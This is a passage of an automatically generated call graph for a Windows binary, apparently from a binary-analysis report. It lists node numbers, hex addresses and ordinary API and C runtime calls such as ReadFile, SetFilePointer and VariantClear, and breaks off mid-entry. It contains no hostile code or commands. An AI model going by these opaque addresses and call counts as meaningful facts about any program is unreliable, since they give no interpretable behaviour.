__write 51 API calls 85237->85239 85240 414e97 85239->85240 85241 414ec9 85240->85241 85242 414f09 85240->85242 85247 414e71 85240->85247 85244 41e1f4 __write 51 API calls 85241->85244 85241->85247 85289 417f77 46 API calls __getptd_noexit 85242->85289 85245 414f64 85244->85245 85246 41e1f4 __write 51 API calls 85245->85246 85245->85247 85246->85247 85247->85220 85249 414455 85248->85249 85253 414477 85248->85253 85250 414139 __fseek_nolock 46 API calls 85249->85250 85249->85253 85251 414470 85250->85251 85290 41b7b2 77 API calls 6 library calls 85251->85290 85254 414139 85253->85254 85255 414145 85254->85255 85256 41415a 85254->85256 85291 417f77 46 API calls __getptd_noexit 85255->85291 85256->85226 85258 41414a 85292 417f25 10 API calls ___wstrgtold12_l 85258->85292 85260 414155 85260->85226 85262 41e200 __alloc_osfhnd 85261->85262 85263 41e223 85262->85263 85264 41e208 85262->85264 85266 41e22f 85263->85266 85271 41e269 85263->85271 85313 417f8a 46 API calls __getptd_noexit 85264->85313 85315 417f8a 46 API calls __getptd_noexit 85266->85315 85267 41e20d 85314 417f77 46 API calls __getptd_noexit 85267->85314 85270 41e234 85316 417f77 46 API calls __getptd_noexit 85270->85316 85293 41ae56 85271->85293 85274 41e26f 85276 41e291 85274->85276 85277 41e27d 85274->85277 85275 41e23c 85317 417f25 10 API calls ___wstrgtold12_l 85275->85317 85318 417f77 46 API calls __getptd_noexit 85276->85318 85303 41e17f 85277->85303 85281 41e215 __alloc_osfhnd 85281->85221 85282 41e289 85320 41e2c0 LeaveCriticalSection __unlock_fhandle 85282->85320 85283 41e296 85319 417f8a 46 API calls __getptd_noexit 85283->85319 85286->85221 85287->85236 85288->85247 85289->85247 85290->85253 85291->85258 85292->85260 85294 41ae62 __alloc_osfhnd 85293->85294 85295 41aebc 85294->85295 85298 4182cb __lock 46 API calls 85294->85298 85296 41aec1 EnterCriticalSection 85295->85296 85297 41aede __alloc_osfhnd 85295->85297 85296->85297 85297->85274 85299 41ae8e 85298->85299 85300 41aeaa 85299->85300 85301 41ae97 InitializeCriticalSectionAndSpinCount 85299->85301 85302 41aeec ___lock_fhandle LeaveCriticalSection 85300->85302 85301->85300 85302->85295 85304 41aded __chsize_nolock 46 API calls 85303->85304 85305 41e18e 85304->85305 85306 41e1a4 SetFilePointer 85305->85306 85307 41e194 85305->85307 85309 41e1c3 85306->85309 85310 41e1bb GetLastError 85306->85310 85308 417f77 ___wstrgtold12_l 46 API calls 85307->85308 85311 41e199 85308->85311 85309->85311 85312 417f9d __dosmaperr 46 API calls 85309->85312 85310->85309 85311->85282 85312->85311 85313->85267 85314->85281 85315->85270 85316->85275 85317->85281 85318->85283 85319->85282 85320->85281 85322 4149ea 85321->85322 85323 4149fe 85321->85323 85367 417f77 46 API calls __getptd_noexit 85322->85367 85324 4149fa 85323->85324 85327 41443c __flush 77 API calls 85323->85327 85339 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 85324->85339 85326 4149ef 85368 417f25 10 API calls ___wstrgtold12_l 85326->85368 85329 414a0a 85327->85329 85340 41d8c2 85329->85340 85332 414139 __fseek_nolock 46 API calls 85333 414a18 85332->85333 85344 41d7fe 85333->85344 85335 414a1e 85335->85324 85336 413748 _free 46 API calls 85335->85336 85336->85324 85337->85070 85338->85075 85339->85075 85341 414a12 85340->85341 85342 41d8d2 85340->85342 85341->85332 85342->85341 85343 413748 _free 46 API calls 85342->85343 85343->85341 85345 41d80a __alloc_osfhnd 85344->85345 85346 41d812 85345->85346 85350 41d82d 85345->85350 85384 417f8a 46 API calls __getptd_noexit 85346->85384 85347 41d839 85386 417f8a 46 API calls __getptd_noexit 85347->85386 85349 41d817 85385 417f77 46 API calls __getptd_noexit 85349->85385 85350->85347 85354 41d873 85350->85354 85353 41d83e 85387 417f77 46 API calls __getptd_noexit 85353->85387 85356 41ae56 ___lock_fhandle 48 API calls 85354->85356 85357 41d879 85356->85357 85359 41d893 85357->85359 85360 41d887 85357->85360 85358 41d846 85388 417f25 10 API calls ___wstrgtold12_l 85358->85388 85389 417f77 46 API calls __getptd_noexit 85359->85389 85369 41d762 85360->85369 85364 41d81f __alloc_osfhnd 85364->85335 85365 41d88d 85390 41d8ba LeaveCriticalSection __unlock_fhandle 85365->85390 85367->85326 85368->85324 85391 41aded 85369->85391 85371 41d7c8 85404 41ad67 47 API calls 2 library calls 85371->85404 85373 41d772 85373->85371 85374 41d7a6 85373->85374 85376 41aded __chsize_nolock 46 API calls 85373->85376 85374->85371 85377 41aded __chsize_nolock 46 API calls 85374->85377 85375 41d7d0 85378 41d7f2 85375->85378 85405 417f9d 46 API calls 3 library calls 85375->85405 85379 41d79d 85376->85379 85380 41d7b2 CloseHandle 85377->85380 85378->85365 85382 41aded __chsize_nolock 46 API calls 85379->85382 85380->85371 85383 41d7be GetLastError 85380->85383 85382->85374 85383->85371 85384->85349 85385->85364 85386->85353 85387->85358 85388->85364 85389->85365 85390->85364 85392 41ae12 85391->85392 85393 41adfa 85391->85393 85395 417f8a __chsize_nolock 46 API calls 85392->85395 85398 41ae51 85392->85398 85394 417f8a __chsize_nolock 46 API calls 85393->85394 85396 41adff 85394->85396 85397 41ae23 85395->85397 85399 417f77 ___wstrgtold12_l 46 API calls 85396->85399 85400 417f77 ___wstrgtold12_l 46 API calls 85397->85400 85398->85373 85401 41ae07 85399->85401 85402 41ae2b 85400->85402 85401->85373 85403 417f25 ___wstrgtold12_l 10 API calls 85402->85403 85403->85401 85404->85375 85405->85378 85407 414c82 __alloc_osfhnd 85406->85407 85408 414cc3 85407->85408 85409 414c96 __recalloc 85407->85409 85410 414cbb __alloc_osfhnd 85407->85410 85411 415471 __lock_file 47 API calls 85408->85411 85433 417f77 46 API calls __getptd_noexit 85409->85433 85410->85080 85413 414ccb 85411->85413 85419 414aba 85413->85419 85414 414cb0 85434 417f25 10 API calls ___wstrgtold12_l 85414->85434 85420 414ad8 __recalloc 85419->85420 85426 414af2 85419->85426 85421 414ae2 85420->85421 85420->85426 85430 414b2d 85420->85430 85486 417f77 46 API calls __getptd_noexit 85421->85486 85423 414ae7 85487 417f25 10 API calls ___wstrgtold12_l 85423->85487 85435 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 85426->85435 85427 414c38 __recalloc 85489 417f77 46 API calls __getptd_noexit 85427->85489 85428 414139 __fseek_nolock 46 API calls 85428->85430 85430->85426 85430->85427 85430->85428 85436 41dfcc 85430->85436 85466 41d8f3 85430->85466 85488 41e0c2 46 API calls 3 library calls 85430->85488 85433->85414 85434->85410 85435->85410 85437 41dfd8 __alloc_osfhnd 85436->85437 85438 41dfe0 85437->85438 85439 41dffb 85437->85439 85559 417f8a 46 API calls __getptd_noexit 85438->85559 85441 41e007 85439->85441 85445 41e041 85439->85445 85561 417f8a 46 API calls __getptd_noexit 85441->85561 85443 41dfe5 85560 417f77 46 API calls __getptd_noexit 85443->85560 85444 41e00c 85562 417f77 46 API calls __getptd_noexit 85444->85562 85448 41e063 85445->85448 85449 41e04e 85445->85449 85450 41ae56 ___lock_fhandle 48 API calls 85448->85450 85564 417f8a 46 API calls __getptd_noexit 85449->85564 85452 41e069 85450->85452 85454 41e077 85452->85454 85455 41e08b 85452->85455 85453 41e053 85565 417f77 46 API calls __getptd_noexit 85453->85565 85490 41da15 85454->85490 85566 417f77 46 API calls __getptd_noexit 85455->85566 85460 41dfed __alloc_osfhnd 85460->85430 85461 41e014 85563 417f25 10 API calls ___wstrgtold12_l 85461->85563 85462 41e083 85568 41e0ba LeaveCriticalSection __unlock_fhandle 85462->85568 85463 41e090 85567 417f8a 46 API calls __getptd_noexit 85463->85567 85467 41d900 85466->85467 85471 41d915 85466->85471 85572 417f77 46 API calls __getptd_noexit 85467->85572 85469 41d905 85573 417f25 10 API calls ___wstrgtold12_l 85469->85573 85472 41d94a 85471->85472 85477 41d910 85471->85477 85569 420603 85471->85569 85474 414139 __fseek_nolock 46 API calls 85472->85474 85475 41d95e 85474->85475 85476 41dfcc __read 59 API calls 85475->85476 85478 41d965 85476->85478 85477->85430 85478->85477 85479 414139 __fseek_nolock 46 API calls 85478->85479 85480 41d988 85479->85480 85480->85477 85481 414139 __fseek_nolock 46 API calls 85480->85481 85482 41d994 85481->85482 85482->85477 85483 414139 __fseek_nolock 46 API calls 85482->85483 85484 41d9a1 85483->85484 85485 414139 __fseek_nolock 46 API calls 85484->85485 85485->85477 85486->85423 85487->85426 85488->85430 85489->85423 85491 41da31 85490->85491 85492 41da4c 85490->85492 85493 417f8a __chsize_nolock 46 API calls 85491->85493 85494 41da5b 85492->85494 85496 41da7a 85492->85496 85495 41da36 85493->85495 85497 417f8a __chsize_nolock 46 API calls 85494->85497 85499 417f77 ___wstrgtold12_l 46 API calls 85495->85499 85498 41da98 85496->85498 85512 41daac 85496->85512 85500 41da60 85497->85500 85501 417f8a __chsize_nolock 46 API calls 85498->85501 85513 41da3e 85499->85513 85503 417f77 ___wstrgtold12_l 46 API calls 85500->85503 85505 41da9d 85501->85505 85502 41db02 85504 417f8a __chsize_nolock 46 API calls 85502->85504 85506 41da67 85503->85506 85507 41db07 85504->85507 85508 417f77 ___wstrgtold12_l 46 API calls 85505->85508 85509 417f25 ___wstrgtold12_l 10 API calls 85506->85509 85510 417f77 ___wstrgtold12_l 46 API calls 85507->85510 85511 41daa4 85508->85511 85509->85513 85510->85511 85516 417f25 ___wstrgtold12_l 10 API calls 85511->85516 85512->85502 85512->85513 85514 41dae1 85512->85514 85515 41db1b 85512->85515 85513->85462 85514->85502 85521 41daec ReadFile 85514->85521 85518 416b04 __malloc_crt 46 API calls 85515->85518 85516->85513 85522 41db31 85518->85522 85519 41dc17 85520 41df8f GetLastError 85519->85520 85527 41dc2b 85519->85527 85523 41de16 85520->85523 85524 41df9c 85520->85524 85521->85519 85521->85520 85525 41db59 85522->85525 85526 41db3b 85522->85526 85533 417f9d __dosmaperr 46 API calls 85523->85533 85538 41dd9b 85523->85538 85529 417f77 ___wstrgtold12_l 46 API calls 85524->85529 85528 420494 __lseeki64_nolock 48 API calls 85525->85528 85530 417f77 ___wstrgtold12_l 46 API calls 85526->85530 85527->85538 85540 41de5b 85527->85540 85541 41dc47 85527->85541 85531 41db67 85528->85531 85532 41dfa1 85529->85532 85534 41db40 85530->85534 85531->85521 85536 417f8a __chsize_nolock 46 API calls 85532->85536 85533->85538 85535 417f8a __chsize_nolock 46 API calls 85534->85535 85535->85513 85536->85538 85537 413748 _free 46 API calls 85537->85513 85538->85513 85538->85537 85539 41ded0 ReadFile 85544 41deef GetLastError 85539->85544 85551 41def9 85539->85551 85540->85538 85540->85539 85542 41dcab ReadFile 85541->85542 85547 41dd28 85541->85547 85543 41dcc9 GetLastError 85542->85543 85550 41dcd3 85542->85550 85543->85541 85543->85550 85544->85540 85544->85551 85545 41ddec MultiByteToWideChar 85545->85538 85546 41de10 GetLastError 85545->85546 85546->85523 85547->85538 85548 41dda3 85547->85548 85549 41dd96 85547->85549 85553 41dd60 85547->85553 85548->85553 85554 41ddda 85548->85554 85552 417f77 ___wstrgtold12_l 46 API calls 85549->85552 85550->85541 85555 420494 __lseeki64_nolock 48 API calls 85550->85555 85551->85540 85556 420494 __lseeki64_nolock 48 API calls 85551->85556 85552->85538 85553->85545 85557 420494 __lseeki64_nolock 48 API calls 85554->85557 85555->85550 85556->85551 85558 41dde9 85557->85558 85558->85545 85559->85443 85560->85460 85561->85444 85562->85461 85563->85460 85564->85453 85565->85461 85566->85463 85567->85462 85568->85460 85570 416b04 __malloc_crt 46 API calls 85569->85570 85571 420618 85570->85571 85571->85472 85572->85469 85573->85477 85577 4148b3 GetSystemTimeAsFileTime __aulldiv 85574->85577 85576 442c6b 85576->85083 85577->85576 85578->85090 85579->85096 85580->85096 85582 45272f __tzset_nolock _wcscpy 85581->85582 85583 414d04 61 API calls __fread_nolock 85582->85583 85584 44afef GetSystemTimeAsFileTime 85582->85584 85585 4528a4 85582->85585 85586 4150d1 81 API calls _fseek 85582->85586 85583->85582 85584->85582 85585->85005 85585->85006 85586->85582 85588 44b1bc 85587->85588 85589 44b1ca 85587->85589 85590 4149c2 116 API calls 85588->85590 85591 44b1e1 85589->85591 85592 44b1d8 85589->85592 85593 4149c2 116 API calls 85589->85593 85590->85589 85622 4321a4 85591->85622 85592->85034 85594 44b2db 85593->85594 85594->85591 85596 44b2e9 85594->85596 85599 414a46 __fcloseall 82 API calls 85596->85599 85603 44b2f6 85596->85603 85597 44b224 85598 44b253 85597->85598 85601 44b228 85597->85601 85626 43213d 85598->85626 85599->85603 85602 44b235 85601->85602 85605 414a46 __fcloseall 82 API calls 85601->85605 85606 44b245 85602->85606 85607 414a46 __fcloseall 82 API calls 85602->85607 85603->85034 85604 44b25a 85608 44b260 85604->85608 85609 44b289 85604->85609 85605->85602 85606->85034 85607->85606 85611 44b26d 85608->85611 85613 414a46 __fcloseall 82 API calls 85608->85613 85636 44b0bf 87 API calls 85609->85636 85614 44b27d 85611->85614 85616 414a46 __fcloseall 82 API calls 85611->85616 85612 44b28f 85637 4320f8 46 API calls _free 85612->85637 85613->85611 85614->85034 85616->85614 85617 44b295 85618 44b2a2 85617->85618 85619 414a46 __fcloseall 82 API calls 85617->85619 85620 44b2b2 85618->85620 85621 414a46 __fcloseall 82 API calls 85618->85621 85619->85618 85620->85034 85621->85620 85623 4321cb 85622->85623 85625 4321b4 __tzset_nolock _memmove 85622->85625 85624 414d04 __fread_nolock 61 API calls 85623->85624 85624->85625 85625->85597 85627 4135bb _malloc 46 API calls 85626->85627 85628 432150 85627->85628 85629 4135bb _malloc 46 API calls 85628->85629 85630 432162 85629->85630 85631 4135bb _malloc 46 API calls 85630->85631 85632 432174 85631->85632 85634 432189 85632->85634 85638 4320f8 46 API calls _free 85632->85638 85634->85604 85635 432198 85635->85604 85636->85612 85637->85617 85638->85635 85639->84935 85640->84937 85641->84955 85642->84955 85643->84955 85644->84946 85645->84955 85646->84955 85647->84959 85648->84969 85649->84968 85650->84968 85700 410160 85651->85700 85653 41012f GetFullPathNameW 85654 410147 moneypunct 85653->85654 85654->84789 85656 4102cb SHGetDesktopFolder 85655->85656 85659 410333 _wcsncpy 85655->85659 85657 4102e0 _wcsncpy 85656->85657 85656->85659 85658 41031c SHGetPathFromIDListW 85657->85658 85657->85659 85658->85659 85659->84792 85661 425f4a 85660->85661 85662 4101bb 85660->85662 85665 4114ab __wcsicoll 58 API calls 85661->85665 85668 425f6e 85661->85668 85663 410160 52 API calls 85662->85663 85664 4101c7 85663->85664 85704 410200 52 API calls 2 library calls 85664->85704 85665->85661 85667 4101d6 85705 410200 52 API calls 2 library calls 85667->85705 85668->84794 85670 4101e9 85670->84794 85672 40f760 126 API calls 85671->85672 85673 40f584 85672->85673 85674 429335 85673->85674 85675 40f58c 85673->85675 85678 4528bd 118 API calls 85674->85678 85676 40f598 85675->85676 85677 429358 85675->85677 85730 4033c0 113 API calls 7 library calls 85676->85730 85731 434034 86 API calls _wprintf 85677->85731 85680 42934b 85678->85680 85683 429373 85680->85683 85684 42934f 85680->85684 85682 40f5b4 85682->84790 85686 4115d7 52 API calls 85683->85686 85687 431e58 82 API calls 85684->85687 85685 429369 85685->85683 85696 4293c5 moneypunct 85686->85696 85687->85677 85688 42959c 85689 413748 _free 46 API calls 85688->85689 85690 4295a5 85689->85690 85691 431e58 82 API calls 85690->85691 85692 4295b1 85691->85692 85696->85688 85697 401b10 52 API calls 85696->85697 85706 444af8 85696->85706 85709 44b41c 85696->85709 85716 402780 85696->85716 85724 4022d0 85696->85724 85732 44c7dd 64 API calls 3 library calls 85696->85732 85697->85696 85701 410167 _wcslen 85700->85701 85702 4115d7 52 API calls 85701->85702 85703 41017e _wcscpy 85702->85703 85703->85653 85704->85667 85705->85670 85707 4115d7 52 API calls 85706->85707 85708 444b27 _memmove 85707->85708 85708->85696 85710 44b429 85709->85710 85711 4115d7 52 API calls 85710->85711 85712 44b440 85711->85712 85713 44b45e 85712->85713 85714 401b10 52 API calls 85712->85714 85713->85696 85715 44b453 85714->85715 85715->85696 85718 402827 85716->85718 85722 402790 moneypunct _memmove 85716->85722 85717 4115d7 52 API calls 85720 402797 85717->85720 85719 4115d7 52 API calls 85718->85719 85719->85722 85721 4115d7 52 API calls 85720->85721 85723 4027bd 85720->85723 85721->85723 85722->85717 85723->85696 85725 4022e0 85724->85725 85726 40239d 85724->85726 85725->85726 85727 4115d7 52 API calls 85725->85727 85729 402320 moneypunct 85725->85729 85726->85696 85727->85729 85728 4115d7 52 API calls 85728->85729 85729->85726 85729->85728 85730->85682 85731->85685 85732->85696 85734 402417 85733->85734 85739 402539 moneypunct 85733->85739 85735 4115d7 52 API calls 85734->85735 85734->85739 85736 402443 85735->85736 85737 4115d7 52 API calls 85736->85737 85738 4024b4 85737->85738 85738->85738 85738->85739 85741 4022d0 52 API calls 85738->85741 85762 402880 85738->85762 85739->84798 85741->85738 85745 401566 85742->85745 85743 401794 85814 40e9a0 90 API calls 85743->85814 85745->85743 85747 4010a0 52 API calls 85745->85747 85748 40167a 85745->85748 85747->85745 85749 4017c0 85748->85749 85815 45e737 90 API calls 3 library calls 85748->85815 85749->84800 85751 40bc70 52 API calls 85750->85751 85760 40d451 85751->85760 85752 40d50f 85819 410600 52 API calls 85752->85819 85754 427c01 85820 45e737 90 API calls 3 library calls 85754->85820 85757 401b10 52 API calls 85757->85760 85758 40d519 85758->84803 85760->85752 85760->85754 85760->85757 85760->85758 85816 40e0a0 52 API calls 85760->85816 85817 40f310 53 API calls 85760->85817 85818 40d860 91 API calls 85760->85818 85763 4115d7 52 API calls 85762->85763 85764 4028b3 85763->85764 85765 4115d7 52 API calls 85764->85765 85802 4028c5 moneypunct _memmove 85765->85802 85766 402780 52 API calls 85767 402b1e moneypunct 85766->85767 85767->85738 85768 427d62 85770 403350 52 API calls 85768->85770 85780 427d6b 85770->85780 85771 402bb6 85805 403060 53 API calls 85771->85805 85772 402aeb moneypunct 85772->85766 85776 42802b moneypunct 85772->85776 85774 402bca 85777 427f63 85774->85777 85778 402bd4 85774->85778 85775 403350 52 API calls 85775->85802 85811 460879 92 API calls 3 library calls 85777->85811 85779 402780 52 API calls 85778->85779 85782 402bdf 85779->85782 85786 427f2c 85780->85786 85808 403020 52 API calls _memmove 85780->85808 85782->85738 85785 427fd5 85812 460879 92 API calls 3 library calls 85785->85812 85810 460879 92 API calls 3 library calls 85786->85810 85787 402780 52 API calls 85787->85802 85791 427fe4 85801 402780 52 API calls 85791->85801 85792 427fa5 85797 402780 52 API calls 85792->85797 85793 402f00 52 API calls 85793->85802 85794 428000 85813 460879 92 API calls 3 library calls 85794->85813 85796 4026f0 52 API calls 85800 402a85 CharUpperBuffW 85796->85800 85797->85767 85799 427f48 85799->85767 85800->85802 85801->85799 85802->85768 85802->85771 85802->85772 85802->85775 85802->85785 85802->85786 85802->85787 85802->85792 85802->85793 85802->85794 85802->85796 85803 4115d7 52 API calls 85802->85803 85804 4031b0 63 API calls 85802->85804 85806 402f80 92 API calls _memmove 85802->85806 85807 402280 52 API calls 85802->85807 85809 4013a0 52 API calls 85802->85809 85803->85802 85804->85802 85805->85774 85806->85802 85807->85802 85808->85780 85809->85802 85810->85799 85811->85799 85812->85791 85813->85767 85814->85748 85815->85749 85816->85760 85817->85760 85818->85760 85819->85758 85820->85758 85821->84816 85822->84817 85824 42c5fe 85823->85824 85839 4091c6 85823->85839 85825 40bc70 52 API calls 85824->85825 85824->85839 85826 42c64e InterlockedIncrement 85825->85826 85827 42c665 85826->85827 85832 42c697 85826->85832 85830 42c672 InterlockedDecrement Sleep InterlockedIncrement 85827->85830 85827->85832 85828 42c737 InterlockedDecrement 85829 42c74a 85828->85829 85833 408f40 VariantClear 85829->85833 85830->85827 85830->85832 85831 42c731 85831->85828 85832->85828 85832->85831 86117 408e80 85832->86117 85835 42c752 85833->85835 86134 410c60 85835->86134 85839->84866 85840 42c6db 85841 402160 52 API calls 85840->85841 85842 42c6e5 85841->85842 85843 45340c 85 API calls 85842->85843 85844 42c6f1 85843->85844 86127 40d200 52 API calls 2 library calls 85844->86127 85846 42c6fb 86128 465124 53 API calls 85846->86128 85848 42c715 85849 42c76a 85848->85849 85850 42c719 85848->85850 85852 401b10 52 API calls 85849->85852 86129 46fe32 85850->86129 85882 40afc4 85881->85882 85883 40b156 85881->85883 85884 40afd5 85882->85884 85885 42d1e3 85882->85885 86203 45e737 90 API calls 3 library calls 85883->86203 85889 40a780 206 API calls 85884->85889 85904 40b11a moneypunct 85884->85904 86204 45e737 90 API calls 3 library calls 85885->86204 85888 42d1f8 85894 408f40 VariantClear 85888->85894 85892 40b00a 85889->85892 85890 40b143 85890->84866 85892->85888 85895 40b012 85892->85895 85893 42d4db 85893->85893 85894->85890 85896 40b04a 85895->85896 85897 40b094 moneypunct 85895->85897 85899 42d231 VariantClear 85895->85899 85906 40b05c moneypunct 85896->85906 86205 40e270 VariantClear moneypunct 85896->86205 85898 40b108 85897->85898 85902 42d425 moneypunct 85897->85902 85898->85904 86206 40e270 VariantClear moneypunct 85898->86206 85899->85906 85900 42d45a VariantClear 85900->85904 85902->85900 85902->85904 85903 4115d7 52 API calls 85903->85897 85904->85890 86207 45e737 90 API calls 3 library calls 85904->86207 85906->85897 85906->85903 85908 408fff 85907->85908 85920 40900d 85907->85920 86208 403ea0 52 API calls __cinit 85908->86208 85911 42c3f6 86211 45e737 90 API calls 3 library calls 85911->86211 85913 42c44a 86213 45e737 90 API calls 3 library calls 85913->86213 85914 40a780 206 API calls 85914->85920 85915 42c47b 86214 451b42 61 API calls 85915->86214 85918 42c564 85924 408f40 VariantClear 85918->85924 85920->85911 85920->85913 85920->85914 85920->85915 85920->85918 85921 42c4cb 85920->85921 85923 42c548 85920->85923 85927 409112 85920->85927 85929 4090df 85920->85929 85931 42c528 85920->85931 85933 4090ea 85920->85933 85941 4090f2 moneypunct 85920->85941 86210 4534e3 52 API calls 85920->86210 86212 40c4e0 206 API calls 85920->86212 86216 47faae 237 API calls 85921->86216 86219 45e737 90 API calls 3 library calls 85923->86219 85924->85941 85925 42c491 85925->85941 86215 45e737 90 API calls 3 library calls 85925->86215 85926 42c4da 85926->85941 86217 45e737 90 API calls 3 library calls 85926->86217 85927->85923 85936 40912b 85927->85936 85929->85933 85934 408e80 VariantClear 85929->85934 86218 45e737 90 API calls 3 library calls 85931->86218 85937 408f40 VariantClear 85933->85937 85934->85933 85936->85941 86209 403e10 53 API calls 85936->86209 85937->85941 85939 40914b 85940 408f40 VariantClear 85939->85940 85940->85941 85941->84866 86220 408d90 85942->86220 85944 429778 85945 410c60 VariantClear 85944->85945 85946 429780 85945->85946 85947 408cf9 85947->85944 85948 42976c 85947->85948 85950 408d2d 85947->85950 86245 45e737 90 API calls 3 library calls 85948->86245 86236 403d10 85950->86236 85953 408d71 moneypunct 85953->84866 85954 408d45 moneypunct 85954->85953 85955 408f40 VariantClear 85954->85955 85955->85954 85957 425c87 85956->85957 85958 40d15f 85956->85958 85959 425cc7 85957->85959 85960 425ca1 TranslateAcceleratorW 85957->85960 85958->84866 85960->85958 85962 42602f 85961->85962 85965 40d17f 85961->85965 85962->84866 85963 40d18c 85963->84866 85964 42608e IsDialogMessageW 85964->85963 85964->85965 85965->85963 85965->85964 86450 430c46 GetClassLongW 85965->86450 85968 4096c6 _wcslen 85967->85968 85969 4115d7 52 API calls 85968->85969 86031 40a70c moneypunct _memmove 85968->86031 85970 4096fa _memmove 85969->85970 85971 4115d7 52 API calls 85970->85971 85973 40971b 85971->85973 85975 409749 CharUpperBuffW 85973->85975 85979 40976a moneypunct 85973->85979 85973->86031 85974 4297aa 85976 4115d7 52 API calls 85974->85976 85975->85979 86018 4297d1 _memmove 85976->86018 86027 4097e5 moneypunct 85979->86027 86453 47dcbb 208 API calls 85979->86453 85980 408f40 VariantClear 85981 42ae92 85980->85981 85982 410c60 VariantClear 85981->85982 85983 42aea4 85982->85983 85984 409aa2 85986 4115d7 52 API calls 85984->85986 85991 409afe 85984->85991 85984->86018 85985 40a689 85988 4115d7 52 API calls 85985->85988 85986->85991 85987 4115d7 52 API calls 85987->86027 86004 40a6af moneypunct _memmove 85988->86004 85989 409b2a 85993 429dbe 85989->85993 86054 409b4d moneypunct _memmove 85989->86054 86460 40b400 VariantClear VariantClear moneypunct 85989->86460 85990 40c2c0 52 API calls 85990->86027 85991->85989 85992 4115d7 52 API calls 85991->85992 85994 429d31 85992->85994 85995 429dd3 85993->85995 86461 40b400 VariantClear VariantClear moneypunct 85993->86461 85999 429d42 85994->85999 86456 44a801 52 API calls 85994->86456 86011 40e1c0 VariantClear 85995->86011 85995->86054 85996 429a46 VariantClear 85996->86027 85997 409fd2 86002 40a045 85997->86002 86055 42a3f5 85997->86055 86457 40e0a0 52 API calls 85999->86457 86006 4115d7 52 API calls 86002->86006 86003 408f40 VariantClear 86003->86027 86012 4115d7 52 API calls 86004->86012 86013 40a04c 86006->86013 86010 42a42f 86465 45e737 90 API calls 3 library calls 86010->86465 86011->86054 86012->86031 86016 40a0a7 86013->86016 86020 4091e0 323 API calls 86013->86020 86014 429d57 86458 453443 52 API calls 86014->86458 86015 40ba10 52 API calls 86015->86027 86038 40a0af 86016->86038 86466 40c790 VariantClear moneypunct 86016->86466 86017 4299d9 86021 408f40 VariantClear 86017->86021 86477 45e737 90 API calls 3 library calls 86018->86477 86020->86016 86026 4299e2 86021->86026 86022 429abd 86022->84866 86023 429d88 86459 453443 52 API calls 86023->86459 86035 410c60 VariantClear 86026->86035 86027->85984 86027->85985 86027->85987 86027->85990 86027->85996 86027->86003 86027->86004 86027->86015 86027->86017 86027->86018 86027->86022 86029 42a452 86027->86029 86033 40a780 206 API calls 86027->86033 86454 40c4e0 206 API calls 86027->86454 86455 40e270 VariantClear moneypunct 86027->86455 86029->85980 86452 4013a0 52 API calls 86031->86452 86033->86027 86034 402780 52 API calls 86034->86054 86090 40a650 moneypunct 86035->86090 86036 408f40 VariantClear 86068 40a162 moneypunct _memmove 86036->86068 86037 41130a 51 API calls __cinit 86037->86054 86039 40a11b 86038->86039 86042 42a4b4 VariantClear 86038->86042 86038->86068 86047 40a12d moneypunct 86039->86047 86467 40e270 VariantClear moneypunct 86039->86467 86040 40a780 206 API calls 86040->86054 86041 4115d7 52 API calls 86041->86054 86042->86047 86044 401980 53 API calls 86044->86054 86045 408e80 VariantClear 86045->86054 86047->86068 86048 408e80 VariantClear 86048->86068 86050 44a801 52 API calls 86050->86054 86051 42a74d VariantClear 86051->86068 86052 40a368 86053 42aad4 86052->86053 86054->85997 86054->86010 86054->86031 86054->86034 86054->86037 86054->86040 86054->86041 86054->86044 86054->86045 86054->86050 86054->86055 86060 409c95 86054->86060 86462 45f508 52 API calls 86054->86462 86463 403e10 53 API calls 86054->86463 86464 47390f VariantClear 86055->86464 86056 42a886 VariantClear 86056->86068 86057 42a7e4 VariantClear 86057->86068 86060->84866 86061 40e270 VariantClear 86061->86068 86065 4115d7 52 API calls 86065->86068 86067 4115d7 52 API calls 86068->86036 86068->86048 86068->86051 86068->86052 86068->86053 86068->86056 86068->86057 86068->86061 86068->86065 86068->86067 86468 470870 52 API calls 86068->86468 86469 44ccf1 VariantClear moneypunct 86068->86469 86090->84866 86094->84866 86095->84827 86096->84832 86097->84866 86098->84866 86099->84866 86100->84866 86101->84866 86102->84862 86103->84862 86104->84862 86105->84862 86106->84862 86107->84862 86108->84862 86110 403cdf 86109->86110 86111 408f40 VariantClear 86110->86111 86112 403ce7 86111->86112 86112->84875 86113->84862 86114->84862 86115->84866 86116->84824 86118 408e88 86117->86118 86120 408e94 86117->86120 86119 408f40 VariantClear 86118->86119 86119->86120 86121 45340c 86120->86121 86122 453439 86121->86122 86123 453419 86121->86123 86122->85840 86124 45342f 86123->86124 86190 4531b1 85 API calls 5 library calls 86123->86190 86124->85840 86126 453425 86126->85840 86127->85846 86128->85848 86135 428372 86134->86135 86136 410c73 moneypunct 86134->86136 86137 40e1c0 VariantClear 86135->86137 86138 42838c 86135->86138 86136->85839 86137->86135 86190->86126 86203->85885 86204->85888 86205->85906 86206->85904 86207->85893 86208->85920 86209->85939 86210->85920 86211->85941 86212->85920 86213->85941 86214->85925 86215->85941 86216->85926 86217->85941 86218->85941 86219->85918 86221 4289d2 86220->86221 86222 408db3 86220->86222 86247 45e737 90 API calls 3 library calls 86221->86247 86246 40bec0 90 API calls 86222->86246 86225 4289e5 86248 45e737 90 API calls 3 library calls 86225->86248 86226 408dc9 86226->86225 86228 40ba10 52 API calls 86226->86228 86229 428a05 86226->86229 86231 40a780 206 API calls 86226->86231 86232 408e64 86226->86232 86234 408f40 VariantClear 86226->86234 86235 408e5a 86226->86235 86228->86226 86230 408f40 VariantClear 86229->86230 86230->86235 86231->86226 86233 408f40 VariantClear 86232->86233 86233->86235 86234->86226 86235->85947 86237 408f40 VariantClear 86236->86237 86238 403d20 86237->86238 86239 403cd0 VariantClear 86238->86239 86240 403d4d 86239->86240 86249 4813fa 86240->86249 86259 46f8cb 86240->86259 86278 4755ad 86240->86278 86241 403d76 86241->85944 86241->85954 86245->85944 86246->86226 86247->86225 86248->86229 86250 45340c 85 API calls 86249->86250 86251 481438 86250->86251 86252 402880 95 API calls 86251->86252 86253 48143f 86252->86253 86254 481465 86253->86254 86255 40a780 206 API calls 86253->86255 86257 481469 86254->86257 86281 40e710 86254->86281 86255->86254 86257->86241 86260 46f8e7 86259->86260 86261 46f978 86259->86261 86262 46f900 86260->86262 86263 46f93c 86260->86263 86264 46f91a 86260->86264 86276 46f8ee 86260->86276 86261->86241 86265 45340c 85 API calls 86262->86265 86267 45340c 85 API calls 86263->86267 86266 45340c 85 API calls 86264->86266 86265->86276 86269 46f931 86266->86269 86270 46f958 86267->86270 86268 45340c 85 API 